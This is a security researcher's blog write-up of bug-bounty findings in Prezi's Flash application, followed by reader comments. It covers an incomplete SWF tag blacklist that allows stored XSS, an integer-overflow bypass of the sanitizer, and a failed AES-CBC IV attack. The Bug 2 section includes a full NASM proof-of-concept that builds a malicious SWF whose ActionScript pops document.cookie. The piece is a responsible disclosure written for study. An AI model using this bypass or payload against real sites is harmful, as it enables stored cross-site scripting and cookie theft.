Some time ago I decided to spend a few evenings playing with bug bounties. I've looked around and finally decided to focus on Prezi, since, being a user of their product, I was already somewhat familiar with it. As I seem to be naturally drawn to low-level areas, this quickly turned into an ActionScript reverse-engineering exercise with digging into the internals of SWF file format. I found a couple of interesting and fun bugs (e.g. an integer overflow that led to ActionScript code execution - you don't commonly see these this far from the C/C++ kingdom), and a few of them are worth sharing in my opinion.

At the bottom of the post I've put some information about the tools I've used, just in case you're curious.

Random announcement not really having anything to do with the post: Dragon Sector is looking for sponsors that would help us play at DEF CON CTF. Thank you. Now back to our show!

What is Prezi?

Before I get to the juicy part, let's do a really quick intro to get everyone into context: Prezi (prezi.com) is basically a huge Flash application that allows you to make cool-looking animated presentations in a really easy way. They provide both online service and storage, and a desktop version which basically is just a standalone Flash application; I focused only on the online application and the surrounding web service.

As far as Prezi Bug Bounty Program goes, you can read all about it at http://prezi.com/bugbounty/. I'll just add that everything (communication, fixing bugs, etc) went smoothly and that Prezi has a really friendly security team :)

Bug 1: SWF sanitization incomplete blacklist into AS code execution (XSS)

One of Prezi's features is embedding user-provided Flash applets into the presentation. Of course, before the SWF is embedded, it's scrubbed for any parts that contain ActionScript or import other SWF files - this is done to prevent executing user's (attacker's) code. As soon as the SWF is clean, it gets loaded into the Prezi's context.

The SWF (under the optional DEFLATE compression layer) is basically a chunk based format. Each chunk starts with a header (and the data follows), that looks like this:

Short chunk: [ data size (6 bits) ][ tag ID (10 bits) ]
Long chunk:  [         0x3f       ][ tag ID (10 bits) ][ data size (32 bits) ]

Both the formats of the chunks and the tag IDs are defined in "SWF File Format Specification" released by Adobe. As of today the current version is 19 updated April 23, 2013, and as to be expected, it has "only" 243 pages. There are currently 94 tag IDs defined (from 0 to 93, with a couple missing, e.g. ID 92 or ID 79-81), with some of them being just iterations of a given chunk type (e.g. ID 2 - DefineShape, ID 22 - DefineShape2, ID 32 - DefineShape3 and ID 83 - DefineShape4).

As mentioned, the scrubbing basically went after the chunks which might lead to code execution - if such chunk was found, it was removed from the SWF.

There are basically three groups of chunks that may result in code execution:
  1. Chunks which just execute code, e.g. ID 59 - DoInitAction or ID 12 - DoAction.
  2. Chunks which import resources (chunks) from other SWF files, e.g. ID 57 - ImportAssets or the second version of this chunk with ID 71.
  3. Chunks representing graphical objects which may have some actions defined - e.g. ID 7 DefineButton, which can perform actions (i.e. run ActionScript) when e.g. it's clicked.
As one can imagine, Prezi did contain three functions responsible for recognizing these groups:

private static function isTagTypeCode(param1:uint) : Boolean
{
 return param1 == 12 || param1 == 59 || param1 == 76 || param1 == 82;
}// end function

private static function isTagTypeImports(param1:uint) : Boolean
{
 return param1 == 57 || param1 == 71;
}// end function

private static function isTagTypeContainsActions(param1:uint) : Boolean
{
 return param1 == 7 || param1 == 26 || param1 == 34 || param1 == 39 || param1 == 70;
}// end function

Here's the catch: isTagTypeContainsActions was never called. So basically embedding a Flash file with e.g. a button that had actions defined (e.g. the "on mouse over" action) led to arbitrary ActionScript code execution in the context of Prezi, which is basically an XSS (and a stored/wormable at that).



The tricky part with the fix here is that ideally you don't want to remove graphical elements from the SWF, so removing whole chunks in this case is an overkill. What you want to do is to remove the actions alone and that requires more code and digging deeper into the format, making the simple solution more complex.

On a more general note: using blacklist is usually a bad idea; for example, a new SWF File Format Specification comes out with Tag ID 95 defined as DoInitAction2 and you have to update the application. You miss a beat and you have an XSS again. A cleaner solution here would be to have a whitelist of allowed tags and just remove everything else.

Bug 2: Integer overflow in AS into XSS

Digging deeper into the chunk removing code I notice the following code:

private static function skipTag(param1:ByteArray) : void
{
 var _loc_2:* = getTagLengthAndSkipHeader(param1);
 param1.position = param1.position + _loc_2;
 return;
}// end function

The red line retrieves an attacker-controlled chunk length from the SWF file - as noted in the previous bug, for long chunks this can be a a 32-bit value, and the returned type is uint.

The yellow line does basically an addition assignment to basically skip past the chunk-that-is-OK in the data stream. The param1.position is also uint according to AS documentation.

You know where this is going :)

In ActionScript uint is a 32-bit unsigned value with modulo arithmetic, so the result of the above addition is also truncated to 32-bit, regardless of its true value. So yes, it's an integer overflow. And it allowed one to bypass the SWF sanitizer.

Exploiting this turned out to be quite interesting and included a small twist which made things even more entertaining.

Starting with the basic idea, here is how the sanitizer worked from a high level perspective (in pseudocode; I'll omit code added after patching previous bug, since it changes nothing):

SWF = decompress(SWF)
SWF.position ← 0
SWF.headers.fileLength ← SWF.length
skip SWF headers
while SWF.bytesAvailable > 0 {
 if Tag at SWF.position is in blacklist {
   eraseTag()
   continue
 }
 skipTag()
}
 
The skipTag was already shown above, so that leaves just the eraseTag method:

old_position ← SWF.position
skipTag()
temp_buffer ← new ByteArray()
temp_buffer.writeBytes(SWF.readFromPositionToEOF())
SWF.position ← old_position
SWF.writeBytes(temp_buffer)
SWF.length ← old_position + temp_buffer.length
SWF.position ← old_position

So eraseTag basically copies whatever is past the tag-to-be-removed on top of that tag and fixes the total data size (SWF.length) afterwards.

The above allows us to basically jump backwards into a middle of a chunk (that's the consequence of the integer overflow) and remove however many bytes we like. This of course leads to changing how the Adobe Flash SWF interpreter will see the file, which is different than how the sanitizer originally saw it.

Let's look at an example:



So basically this is what's happening here (in chronological order):
  • The sanitizer reaches the overflowing tag and jumps backward into the first shown tag's data.
  • The data contains a valid chunk header, which described a tag which is on the blacklist. This chunk gets removed.
  • The next tag (which originally was just second chunk's data) has a huge length which sends the sanitizer to EOF and so the sanitizer exits.
  • When the Adobe Flash SWF parsers sees the output, it sees the "send to EOF" chunk, the overflowing chunk and the padding just as the first tags data, and ignores is (ShowFrame has no meaningful data from SWF parsers perspective).
  • And it reaches the hidden "evil" tags which contain ActionScript to execute. The sanitizer never had a chance to see and sanitize these tags, since it was sent backwards and then to EOF.
Now, here's the catch: Prezi's sanitizing code has a bug which triggers a quirky behavior in Adobe Flash, which prevents execution of any ActionScript.

Remember these lines?

SWF = decompress(SWF)
...
SWF.headers.fileLength ← SWF.length

This fixes the SWF length after decompression. However, the file length in the SWF headers should also be fixed if any chunk gets removed and it's not. For some reason incorrect size causes Flash to ignore any ActionScript (I never got into the bottom of why exactly is this happening though; though it acted very peculiarly).

So, to exploit this I needed to make the sanitizer fix the headers for me. This turned out to be both simple and a little more tricky. Simple, because the overflow allowed me to send the sanitizer back as far as I wanted - e.g. to the beginning of the SWF headers. And more tricky, because the DWORD representing the file size is just after the SWF magic and version, so that means I had to make the file size be at the same time a valid chunk header for a blacklisted chunk (but that turned out to not be a problem).

The final setup looked like this (in the data of the hidden junks the sanitizer was sent to EOF of course):



The NASM code (it's the way I prefer to generate simple binary files - don't worry, it's "Ange Approved" ;>) to generate a PoC according to the above schema looks like this:

[bits 32]
org 0
start:

; SWF file

; ----------------------- HEADERS
db "FWS"
db 6      ; version 6

size_of_data_header:
dd end_of_file ; size of data

db 0x78, 0, 5,0x5f,0,0,0xf,0xa0,0; RECT (200x200)

db 0, 12 ; 12.0 FPS
dw 1     ; 1 Frame

; ----------------------- TAGS
%macro TAG_SHORT 2
 dw (%2 | %1 <<6)
%endmacro

%macro TAG_LONG 2
 %2:
 dw (0x3f | %1 << 6)
 dd .end - ($ + 4)
%endmacro

%macro TAG_LONG_MANUAL 2
 dw (0x3f | %1 << 6)
 dd %2
%endmacro

%define TAG_End 0
%define TAG_ShowFrame 1
%define TAG_DefineShape 2
%define TAG_SetBackgroundColor 9
%define TAG_PlaceObject2 26
%define TAG_DoAction 12

; Start of tags.

; Trigger the integer overflow to go back to the size of data field
TAG_LONG_MANUAL TAG_ShowFrame, -(($ - size_of_data_header) + 4)
times 41 db 0xaa

; Data continues here.
; Or actually it's the headers we need to rebuild.

dd 766 ; New file size. It's equal to tag 11, size 62
db 0x78, 0, 5,0x5f,0,0,0xf,0xa0,0; RECT (200x200)

db 0, 12 ; 12.0 FPS
dw 1     ; 1 Frame

; There are 47 bytes left here before that crazy thing returns.
; times 47 db 0xaa
TAG_LONG TAG_DoAction, MyAction1
 ; ACTIONSCRIPT v2
 db 0x83
 dw .StringsEnd1 - ($ + 2) ; Size
 db "javascript:prompt(document.domain,"
; Fun fact - in 4 bytes the crazy thing returns.
 db '"   '
; It's here. Well, send it back to the void or something.
 db 0x3f ; Long tag size. (it's actually '?')
 db ':'  ; Tag ID. Whatever.
 db '    ' ; 0x20202020 - this should be enough to get rid of it for good.
 db '" + '  ; And were done here.
 ; Let's continue were we left, shall we?
 db "document.cookie);", 0
 db "", 0 ; _blank
 .StringsEnd1:
 .ActionsEnd: db 0 ; EndOfAction Flag
.end

TAG_SHORT TAG_ShowFrame, 0
TAG_LONG TAG_End, MyEnd

; End.
; 12 << 6 == 768
; + 0x3e == 830
times (((12 << 6) | 0x3e) - ($-start)) db 0xcc
.end:
end_of_file:

Of course ideally you wouldn't redirect the sanitizer into the middle of your AS/JS payload, but it's just a PoC, so no sense thinking too much about it I guess; especially that it worked:



Again, I would classify this as a stored/wormable XSS.

Bug 3 (unexploitable): Abusing the AES-128-CBC IV

Let's document some failures as well :)

This bug did exist (so it wasn't a false-positive), but it turned out to be non-exploitable due to how bloated the SWF headers are. Still, it's a pretty fun example of what you can attempt to do with crypto in certain, very specific, scenarios.

Let's start by discussing how Prezi is (was) loaded (I'll simplify it a little to focus on the important part):
  1. The website actually embeds a loader (called preziloader-*.swf).
  2. The loader fetches a 128-bit AES key and a 128-bit AES IV key from /api/embed (yes, it's a relative path).
  3. The loader loads into a ByteArray the main module: main-*.swf from *.prezi.com (the domain is verified).
  4. The first 2064 bytes of the main SWF file are decrypted using AES-128-CBC, using the retrieved keys. The rest of the bytes are already plain-text.
  5. The main SWF is loaded into the same security context.
This means that:
  • We don't control main-*.swf at all.
  • But we do control both AES key and IV.
And, whoever controls the AES-128-CBC IV, fully controls the first 16 bytes of the decrypted main-*.swf.

This is because AES in CBC mode works like this:
  1. Take the next 16-byte block.
  2. Decrypt the block using AES KEY and AES algorithm.
  3. XOR the result with the 16-byte IV and that's the decrypted block.
  4. GOTO 1 until end of data.
So basically:
  1. We know the result of the decryption of the first block (we can just grab main-*.swf and decrypt it using either their AES key or a different key that will give "wrong" data, that doesn't really matter).
  2. And we can choose what to XOR it with (IV).
So, basically, we choose the result of the decryption of the first block* (and get trashed data in all the other blocks).
* - actually, if we think of the data as 16-byte rows, then we control one byte in each column, in a row of our choice; all bytes don't have to be in the same row.

There are a couple of important things to note:
  • The IV gives us only 16-bytes to control.
  • Doing some AES key brute forcing it might be possible to control additionally 2-5 bytes - however the time to get the additional bytes grows exponentially - it's 256**N operations (AES decryptions) basically, where N is the number of additional bytes we would like to control. This is also tricky for another reason (it will create additional constraints for byte values due to the IV changes we will have to make).
  • Prezi actually uses AES-128-CBC with PKCS#5, so padding bytes have to have the value of padding length (e.g. 5-byte padding has to look like this: 05 05 05 05 05). And remember: if we choose a different key/IV, the original padding will be destroy. This can be bypassed by choosing such an IV, that the last byte in the last block is 0x00 or 0x01 (then the padding is not checked because it's assumed that there is no padding at all, or it's a one-byte padding only). So this is not a huge problem.
  • If we choose the ZWS format for the SWF file, Prezi loader is nice enough to fix the magic and file size in the SWF header, so that's 7 bytes we wouldn't have to worry about. But there is an additional LZMA header which we would have to start worrying about, so it gives us nothing.
  • Probably some of the bytes in the SWF header can have a broken value and the SWF will still work. So we don't have to worry about these bytes.
To sum up: we would control about 18-21 bytes, wouldn't have to worry about a few more and everything else would be "random bytes" (the result of decrypting data with wrong key and IV).

Sadly/thankfully (depending on the perspective) in the end this is not exploitable with SWFs, because one would need to control about 50 bytes of SWF to make a valid file that has some meaningful code which gives you code execution. So... close, but no cigar :)

Tools used

In no particular order:
  • Sothink SWF Decompiler - Pretty fast and accurate tool. Had minor problems with a function or two, but that's still really good. You can re-compile the code it generates without any changes at all (very useful for testing).
  • JPEXS Free Flash Decompiler (aka FFDec) - A free and opensource SWF decompiler. Takes its time when decompiling, but sometimes does a better job than Sothink. It can also extract SWF files from process' (think: browser's) memory - this proved useful. I didn't try to re-compile the code it generates.
  • Netwide Assembler (aka NASM) - An x86 assembler which I commonly misuse to assemble non-complex binary files.
  • Adobe Flex - Your basic ActionScript compiler.
  • Python - For additional scripts and mini-tools.
  • Firefox + Fiddler - HTTP communication monitoring.

And that's about it. Let me know if you have any questions or if I got something wrong.

Comments:

2014-03-27 13:55:02 = hdarwin
{
This post has given me a new perspective on hacking!

Thank you!
}
2014-03-27 16:43:29 = Peter Ferrie
{
When considering black- vs white-listing, the idea to remove anything not on the white-list has its own problem: if Adobe releases a new harmless-but-essential ID and someone uses it, then the Prezi version won't run until Prezi is updated. While that is much better from a security point of view, the user experience is terrible.
}
2014-03-27 18:15:56 = Attila Suszter
{
@Peter: In case of white-listing, it's reasonable to assume that adding a new ID is a major functional change. If Adobe releases beta version of major changes, that would allow some time for Prezi to update its code until the final version is released by Adobe.

In case of black-listing, it is good to audit Flash Player if it has undocumented ID that can execute action -- if it has not happened. It's known that it has undocumented byte codes, even I wrote about it.
}
2014-03-28 09:13:01 = WawaSeb
{
What a nice work.
Thanks...

Does somebody succeed re-compiling code generated by FFDec ?

}
2014-03-28 11:25:33 = am
{
can you elaborate a bit on the integer overflow part please?

Thanks!
}
2014-03-31 15:50:03 = Marc Ruef
{
Brilliant finding and great writeup!
}

Add a comment:

Nick:
URL (optional):
Math captcha: 7 ∗ 5 + 1 =